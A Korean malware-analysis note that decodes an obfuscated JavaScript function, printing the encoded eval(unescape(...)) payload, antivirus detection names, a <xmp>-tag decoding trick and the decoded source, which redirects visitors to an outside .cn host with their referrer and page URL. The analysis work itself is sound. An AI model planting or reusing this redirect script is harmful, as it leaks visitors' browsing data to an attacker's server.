[스크립트 디코딩] 호출부가 없는 함수 - eval 이 있는 경우

아래와 같은 악성 스크립트가 있다.

function s(rt)
{
 eval(unescape("uj%3Ddocument%3Bt%3D0%3Bvar1%3D5423%3Bvar2%3Dvar1%3Bv%3D%27mm.cn%27%3Bif%28var1%3D%3Dvar2%29document.location%3D%27http%3A%2F%2F491%27%2Bv%2B%27%2Fst%2F%3Fds%3D%27%2Brt%2B%27%26tm%3D%27%2Bt%2B%27%26pe%3D%27%2Bescape%28uj.referrer%29%2B%27%26oi%3D%27%2Bescape%28window.location.href%29%3B"));
}

AV 업체들의 진단은 아래와 같다.

Comodo                    Exploit.JS.Redirect.~N
Authentium                JS/Linker.BH
ViRobot                    Spyware.JS.Small.Do.322
Symantec                  Trojan.Malscript!html
Antiy-AVL                 Trojan/JS.Small
Ikarus                      Trojan-Downloader.JS.Small
a-squared                 Trojan-Downloader.JS.Small!IK
F-Secure                  Trojan-Downloader.JS.Small.oa
Kaspersky                 Trojan-Downloader.JS.Small.oa

파일 자체가 실행되는 것은 아니고, 다른 스크립트에서 함수 s 만 호출하는 것으로 생각된다.

이 스크립트의 내용을 확인하기 위해서는 'function s(rt)' 부분을 제외하고

eval( 과 unescape("~") 사이에 "<xmp>"+ 를 넣고 끝에 </xmp> 추가

이렇게 파싱해주면 원본 메시지가 나타난다.

[ 파싱을 위해 <xmp> 를 추가한 인코딩 데이터 ]

eval("<xmp>"+unescape("uj%3Ddocument%3Bt%3D0%3Bvar1%3D5423%3Bvar2%3Dvar1%3Bv%3D%27mm.cn%27%3Bif%28var1%3D%3Dvar2%29document.location%3D%27http%3A%2F%2F491%27%2Bv%2B%27%2Fst%2F%3Fds%3D%27%2Brt%2B%27%26tm%3D%27%2Bt%2B%27%26pe%3D%27%2Bescape%28uj.referrer%29%2B%27%26oi%3D%27%2Bescape%28window.location.href%29%3B")+"</xmp>");

[ 원본 메시지 ]

function s(rt)
{

uj=document;

t=0;

var1=5423;

var2=var1;

v='mm.cn';

if(var1==var2)

document.location='http://491'+v+'/st/?ds='+rt+'&tm='+t+'&pe='+escape(uj.referrer)+'&oi='+escape(window.location.href);

}

<xmp> 이외에도 <textarea> 도 가능하다고 들었는데, 다음에는 이것을 시도를 해봐야겠다.